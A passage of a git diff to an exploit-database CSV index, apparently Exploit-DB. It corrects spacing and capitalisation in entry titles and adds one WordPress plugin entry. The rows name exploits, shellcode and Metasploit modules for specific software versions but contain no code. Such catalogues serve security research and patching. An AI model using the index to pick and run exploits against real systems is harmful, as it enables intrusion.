Bridge SA",php,webapps,0 -34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg'Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0 +34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0 34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Security Vulnerabilities",2010-08-16,Lincoln,php,webapps,0 34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0 @@ -31083,7 +31086,7 @@ id,file,description,date,author,platform,type,port 34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service",2010-08-20,"Elena Stepanova",linux,dos,0 -34511,platforms/php/webapps/34511.txt,"Mulitple Wordpress Themes - 'admin-ajax.php img parameter'Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34511,platforms/php/webapps/34511.txt,"Mulitple Wordpress Themes - 'admin-ajax.php img parameter' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"Wordpress Slideshow Gallery Plugin 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 @@ -31100,7 +31103,7 @@ id,file,description,date,author,platform,type,port 34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0 34684,platforms/php/webapps/34684.pl,"Joomla Spain Component - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0 -34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - '.mls'Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos,0 +34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos,0 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",php,webapps,0 34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting",2010-08-23,"High-Tech Bridge SA",php,webapps,0 34534,platforms/php/webapps/34534.txt,"TCMS - Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 @@ -31133,7 +31136,7 @@ id,file,description,date,author,platform,type,port 34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,php,webapps,0 34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro - 'c.php' SQL Injection",2010-09-02,MustLive,php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 -34578,platforms/php/webapps/34578.txt,"Wordpress Acento Theme - 'view-pdf.php file parameter'Arbitrary File Download",2014-09-08,alieye,php,webapps,80 +34578,platforms/php/webapps/34578.txt,"Wordpress Acento Theme - 'view-pdf.php file parameter' Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 @@ -31246,7 +31249,7 @@ id,file,description,date,author,platform,type,port 34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'searchstring' Parameter Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps,0 34694,platforms/php/webapps/34694.txt,"ClipBucket 1.7.1 - Multiple SQL Injections",2009-07-24,Qabandi,php,webapps,0 -34695,platforms/windows/remote/34695.c,"GreenBrowser - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 +34695,platforms/windows/remote/34695.c,"GreenBrowser - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 34696,platforms/windows/remote/34696.c,"Easy Office Recovery - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 34697,platforms/windows/remote/34697.c,"Sothink SWF Decompiler - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 34698,platforms/windows/dos/34698.txt,"Microsoft Excel 2002 - Memory Corruption",2010-09-23,Abysssec,windows,dos,0 @@ -31284,7 +31287,7 @@ id,file,description,date,author,platform,type,port 34731,platforms/php/webapps/34731.txt,"DragDropCart - includes/ajax/getstate.php prefix Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34732,platforms/php/webapps/34732.txt,"DragDropCart - 'index.php' search Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34733,platforms/php/webapps/34733.txt,"DragDropCart - search.php search Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34734,platforms/php/webapps/34734.txt,"DragDropCart - login.php redirect Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34734,platforms/php/webapps/34734.txt,"DragDropCart - 'login.php' redirect Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34735,platforms/php/webapps/34735.txt,"DragDropCart - productdetail.php product Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34729,platforms/windows/dos/34729.py,"Seafile-server 3.1.5 - Remote Denial of Service",2014-09-20,"nop nop",windows,dos,0 34736,platforms/php/webapps/34736.txt,"EZArticles - 'articles.php' Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 @@ -31506,7 +31509,7 @@ id,file,description,date,author,platform,type,port 34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 - 'id' Parameter SQL Injection",2010-11-05,jos_ali_joe,php,webapps,0 34973,platforms/php/webapps/34973.txt,"Wordpress FeedList 2.61.01 Plugin - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 34974,platforms/php/webapps/34974.txt,"Wordpress WP Survey And Quiz Tool 1.2.1 Plugin - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 -34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - 'BthPan.sys'Privilege Escalation",2014-10-15,Metasploit,win_x86,local,0 +34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Privilege Escalation",2014-10-15,Metasploit,win_x86,local,0 34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 34995,platforms/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 34984,platforms/php/webapps/34984.py,"Drupal Core 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (1)",2014-10-16,fyukyuk,php,webapps,0 @@ -31601,6 +31604,7 @@ id,file,description,date,author,platform,type,port 35078,platforms/unix/remote/35078.rb,"Centreon - SQL Injection / Command Injection",2014-10-27,Metasploit,unix,remote,80 35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation",2014-10-27,"Brandon Perry",jsp,webapps,8585 35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80 +40333,platforms/php/webapps/40333.txt,"WordPress RB Agency Plugin 2.4.7 - Local File Disclosure",2016-09-05,"Persian Hack Team",php,webapps,80 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,ios,webapps,1861 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0 @@ -31625,7 +31629,7 @@ id,file,description,date,author,platform,type,port 35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Pre-Authenticated Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",multiple,webapps,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0 -35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax'Buffer Overflow/Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 +35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce - 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,php,webapps,0 35107,platforms/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0 @@ -31809,7 +31813,7 @@ id,file,description,date,author,platform,type,port 35312,platforms/php/webapps/35312.txt,"Firebook - 'index.html' Cross-Site Scripting",2011-02-03,MustLive,php,webapps,0 35567,platforms/php/webapps/35567.txt,"Eleanor CMS - Cross-Site Scripting / Multiple SQL Injection",2011-04-05,"High-Tech Bridge SA",php,webapps,0 35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Inclusion",2011-04-05,"High-Tech Bridge SA",php,webapps,0 -35314,platforms/linux/remote/35314.txt,"Wireshark 1.4.3 - '.pcap'Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 +35314,platforms/linux/remote/35314.txt,"Wireshark 1.4.3 - '.pcap' Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' Parameter SQL Injection",2011-02-07,NoNameMT,php,webapps,0 35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management - Authentication Bypass",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0 35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0 @@ -31870,7 +31874,7 @@ id,file,description,date,author,platform,type,port 35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting",2011-02-22,andrew,php,webapps,0 35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Parameter Cross-Site Scripting",2011-02-22,"Aung Khant",php,webapps,0 35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Inclusion",2011-02-16,"AutoSec Tools",php,webapps,0 -35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax'SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 +35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 @@ -31886,8 +31890,8 @@ id,file,description,date,author,platform,type,port 35394,platforms/php/webapps/35394.txt,"Wordpress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting",2011-02-23,MustLive,php,webapps,0 -35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf'Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0 -35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps'Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0 +35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0 +35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0 35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for Wordpress - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 35401,platforms/php/webapps/35401.txt,"SnapProof - 'retPageID' Parameter Cross-Site Scripting",2011-02-28,"difficult 511",php,webapps,0 35402,platforms/php/webapps/35402.txt,"Forritun - Multiple SQL Injections",2011-03-02,eXeSoul,php,webapps,0 @@ -31952,7 +31956,7 @@ id,file,description,date,author,platform,type,port 35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection",2014-12-04,"Robert Cooper",cgi,webapps,80 35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 - URI SecURIty Bypass",2011-03-14,"DcLabs Security Research Group",multiple,remote,0 -35465,platforms/multiple/dos/35465.pl,"VLC Media Player 1.0.5 - '.ape'Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0 +35465,platforms/multiple/dos/35465.pl,"VLC Media Player 1.0.5 - '.ape' Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0 35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0 35467,platforms/php/webapps/35467.txt,"SugarCRM 6.1.1 - Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0 35468,platforms/windows/remote/35468.pl,"Monkey's Audio - '.ape' Buffer Overflow",2011-03-16,KedAns-Dz,windows,remote,0 @@ -31985,9 +31989,9 @@ id,file,description,date,author,platform,type,port 35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection",2011-03-24,"High-Tech Bridge SA",php,webapps,0 35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 - 'skin' Parameter Cross-Site Scripting",2011-03-24,"AutoSec Tools",php,webapps,0 35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 - 'subject' Parameter HTML Injection",2011-03-25,"Zero Science Lab",php,webapps,0 -35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 - '.rmp'Remote Buffer Overflow",2011-03-27,KedAns-Dz,multiple,remote,0 +35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 - '.rmp' Remote Buffer Overflow",2011-03-27,KedAns-Dz,multiple,remote,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 -35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni'SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 +35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection",2011-04-27,"Alberto Revelli",jsp,webapps,0 35673,platforms/php/webapps/35673.txt,"Wordpress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35674,platforms/php/webapps/35674.txt,"Wordpress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 @@ -31997,7 +32001,7 @@ id,file,description,date,author,platform,type,port 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection",2014-12-09,"ZoRLu Bugrahan",php,webapps,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0 -35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f'Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote,0 +35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote,0 35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35558,platforms/php/webapps/35558.txt,"PHP-Fusion - 'articles.php' Cross-Site Scripting",2011-04-02,KedAns-Dz,php,webapps,0 @@ -32124,7 +32128,7 @@ id,file,description,date,author,platform,type,port 35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authenticated Remote Code Execution",2014-12-30,drone,windows,remote,0 35657,platforms/php/webapps/35657.php,"Sermon Browser Wordpress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 -35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj'Heab-based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0 +35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0 35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35664,platforms/php/webapps/35664.txt,"phpList 2.10.x - 'email' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Parameter Cross-Site Scripting",2011-04-26,KedAns-Dz,php,webapps,0 @@ -32157,7 +32161,7 @@ id,file,description,date,author,platform,type,port 35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - Cross-Site Scripting Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 35713,platforms/php/webapps/35713.txt,"FestOS 2.3c - 'upload.php' Arbitrary File Upload",2011-05-08,KedAns-Dz,php,webapps,0 -35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack-Based Buffer Overflow",2011-05-09,KedAns-Dz,windows,remote,0 +35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow",2011-05-09,KedAns-Dz,windows,remote,0 35712,platforms/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow",2015-01-06,Metasploit,windows,local,0 35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Parameter Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products - 'theme_dir' Parameter Cross-Site Scripting",2011-05-03,Hector.x90,php,webapps,0 @@ -32174,7 +32178,7 @@ id,file,description,date,author,platform,type,port 35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 - 'login.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 - 'index.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 -35719,platforms/php/webapps/35719.py,"PHPWebSite 1.7.1 - 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 +35719,platforms/php/webapps/35719.py,"phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 35720,platforms/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 35721,platforms/hardware/webapps/35721.txt,"Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure",2015-01-07,"Eduardo Novella",hardware,webapps,80 35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 @@ -32338,7 +32342,7 @@ id,file,description,date,author,platform,type,port 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 35879,platforms/php/webapps/35879.txt,"Wordpress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 35880,platforms/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 -35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0 +35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0 35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 @@ -32519,7 +32523,7 @@ id,file,description,date,author,platform,type,port 36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'filemanager/controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 -36085,platforms/php/webapps/36085.txt,"PHPWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 +36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0 36087,platforms/php/webapps/36087.txt,"Wordpress Fancybox 3.0.2 Plugin - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0 36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 @@ -33181,7 +33185,7 @@ id,file,description,date,author,platform,type,port 36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 36780,platforms/win_x86/shellcode/36780.c,"Win32/XP SP3 - Restart computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 -36781,platforms/lin_x86/shellcode/36781.py,"Linux/x86 - custom execve-shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0 +36781,platforms/lin_x86/shellcode/36781.py,"Linux/x86 - custom execve-Shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0 36782,platforms/linux/local/36782.sh,"Apport 2.14.1 (Ubuntu 14.04.2) - Privilege Escalation",2015-04-17,"Ricardo F. Teixeira",linux,local,0 36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php' class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 @@ -33201,7 +33205,7 @@ id,file,description,date,author,platform,type,port 36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 Plugin - SQL Injection",2015-04-21,"Claudio Viviani",php,webapps,0 36801,platforms/php/webapps/36801.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Arbitrary File Download (2)",2015-04-21,"dadou dz",php,webapps,0 36802,platforms/php/webapps/36802.txt,"Wordpress Tune Library Plugin 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 -36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 +36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - (mod_copy) Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 36805,platforms/php/webapps/36805.txt,"Wordpress Community Events Plugin 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow",2015-04-21,Metasploit,windows,remote,0 @@ -33644,7 +33648,7 @@ id,file,description,date,author,platform,type,port 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 -37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,Metasploit,linux,remote,0 +37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution",2015-06-10,Metasploit,linux,remote,0 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File 